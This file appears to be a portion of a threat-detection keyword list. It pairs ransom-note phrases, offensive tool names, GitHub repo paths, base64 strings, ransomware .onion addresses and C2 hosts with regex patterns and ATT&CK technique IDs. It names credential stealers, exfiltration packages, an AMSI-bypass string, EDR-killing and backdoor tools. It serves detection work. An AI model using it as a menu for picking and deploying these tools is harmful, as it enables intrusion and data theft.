"*Your Files Have Been Encrypted!*What Happened to My Files?*",".{0,1000}Your\sFiles\sHave\sBeen\sEncrypted!.{0,1000}What\sHappened\sto\sMy\sFiles\?.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","63385"
"*Your files have been infected and stolen*",".{0,1000}Your\sfiles\shave\sbeen\sinfected\sand\sstolen.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","63386"
"*YOUR FILES HAVE BEEN SUCCESSFULLY DECRYPTED*",".{0,1000}YOUR\sFILES\sHAVE\sBEEN\sSUCCESSFULLY\sDECRYPTED.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","63387"
"*Your finest PE backdooring companion*",".{0,1000}Your\sfinest\sPE\sbackdooring\scompanion.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","63388"
"*Your Moms Smart Vibrator*",".{0,1000}Your\sMoms\sSmart\sVibrator.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","#useragent","user-agent","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","63389"
"*Your network has been penetrated.*",".{0,1000}Your\snetwork\shas\sbeen\spenetrated\..{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","63390"
"*your script has been obfuscated and output to *",".{0,1000}your\sscript\shas\sbeen\sobfuscated\sand\soutput\sto\s.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","63391"
"*your sensitive data, which we Will leak or sell in case of no cooperation*",".{0,1000}your\ssensitive\sdata,\swhich\swe\sWill\sleak\sor\ssell\sin\scase\sof\sno\scooperation.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63392"
"*YOUR SERVER HAS BEED HACKED *",".{0,1000}YOUR\sSERVER\sHAS\sBEED\sHACKED\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63393"
"*Your speaktext was sent to the speaker as voice. Mohahaha*",".{0,1000}Your\sspeaktext\swas\ssent\sto\sthe\sspeaker\sas\svoice\.\sMohahaha.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","63394"
"*Your version of Luna Token Grabber is outdated!*",".{0,1000}Your\sversion\sof\sLuna\sToken\sGrabber\sis\soutdated!.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","63395"
"*your_encrypted_files.txt*",".{0,1000}your_encrypted_files\.txt.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","63396"
"*YOUR_FILES_ARE_ENCRYPTED.HTML*",".{0,1000}YOUR_FILES_ARE_ENCRYPTED\.HTML.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","63397"
"*Yourman.sh Mini Shell*",".{0,1000}Yourman\.sh\sMini\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","63398"
"*yo-yo-yo-jbo/hotkeyz*",".{0,1000}yo\-yo\-yo\-jbo\/hotkeyz.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","1","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","63399"
"*YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==*",".{0,1000}YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA\=\=.{0,1000}","offensive_tool_keyword","powershell","amsi bypass base64 string","T1059.001 - T1562.001 - T1562.009","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#base64","N/A","8","8","N/A","N/A","N/A","N/A","63400"
"*ysoserial -*",".{0,1000}ysoserial\s\-.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63401"
"*ysoserial-*.zip",".{0,1000}ysoserial\-.{0,1000}\.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63402"
"*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","63403"
"*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","63404"
"*ysoserial.exe*",".{0,1000}ysoserial\.exe\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63405"
"*ysoserial.net*",".{0,1000}ysoserial\.net.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63406"
"*ysoserial.sln*",".{0,1000}ysoserial\.sln.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63407"
"*ytisf/PyExfil*",".{0,1000}ytisf\/PyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","63408"
"*ytmrdnutyd5drtny.azurewebsites.net*",".{0,1000}ytmrdnutyd5drtny\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","63409"
"*yunuscadirci/CallStranger*",".{0,1000}yunuscadirci\/CallStranger.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","N/A","5","403","63","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z","63412"
"*Yuuup!! Pass Cracked*",".{0,1000}Yuuup!!\sPass\sCracked.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63413"
"*YwBhAGwAYwA=*",".{0,1000}YwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","63414"
"*Z1P73136r4M(*",".{0,1000}Z1P73136r4M\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63415"
"*Z1P7H1N65(*",".{0,1000}Z1P7H1N65\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63416"
"*Z1PF01D3r(*",".{0,1000}Z1PF01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63417"
"*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*",".{0,1000}Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63418"
"*Z2VudGlsa2l3aQ==*",".{0,1000}Z2VudGlsa2l3aQ\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","63419"
"*Z2VudGlsa2l3aQ==*",".{0,1000}Z2VudGlsa2l3aQ\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","63420"
"*z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion*",".{0,1000}z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63421"
"*Z4nzu/hackingtool*",".{0,1000}Z4nzu\/hackingtool.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","63422"
"*z6vidveub2ypo3d3x7omsmcxqwxkkmvn5y3paoufyd2tt4bfbkg33kid.onion*",".{0,1000}z6vidveub2ypo3d3x7omsmcxqwxkkmvn5y3paoufyd2tt4bfbkg33kid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63423"
"*zabbix_session_exp.py -*",".{0,1000}zabbix_session_exp\.py\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z","63426"
"*zabbix_session_exp.py https*",".{0,1000}zabbix_session_exp\.py\shttps.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","N/A","1","1","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z","63427"
"*zabbix_session_exp.py*",".{0,1000}zabbix_session_exp\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","N/A","2","151","47","2024-08-11T18:14:56Z","2022-02-18T11:51:47Z","63428"
"*ZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA*",".{0,1000}ZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#base64","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","63429"
"*ZAQwsxcde321*",".{0,1000}ZAQwsxcde321.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","63431"
"*zarp.py*",".{0,1000}zarp\.py.{0,1000}","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","N/A","10","1468","327","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z","63432"
"*zblurx/certsync*",".{0,1000}zblurx\/certsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","63434"
"*zblurx/dploot*",".{0,1000}zblurx\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","63435"
"*zcgonvh/DCOMPotato*",".{0,1000}zcgonvh\/DCOMPotato.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","63436"
"*ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd.onion*",".{0,1000}ze677xuzard4lx4iul2yzf5ks4gqqzoulgj5u4n5n4bbbsxjbfr7eayd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63437"
"*zed2john.py*",".{0,1000}zed2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63438"
"*zenoss_3x_command_execution*",".{0,1000}zenoss_3x_command_execution.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63441"
"*zeonrefpbompx6rwdqa5hxgtp2cxgfmoymlli3azoanisze33pp3x3yd.onion*",".{0,1000}zeonrefpbompx6rwdqa5hxgtp2cxgfmoymlli3azoanisze33pp3x3yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63442"
"*zephrax/linux-pam-backdoor*",".{0,1000}zephrax\/linux\-pam\-backdoor.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","63443"
"*ZephrFish/ADFSDump-PS*",".{0,1000}ZephrFish\/ADFSDump\-PS.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","1","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","63444"
"*ZephrFish/Stompy*",".{0,1000}ZephrFish\/Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","63445"
"*zer0condition/mhydeath*",".{0,1000}zer0condition\/mhydeath.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","63446"
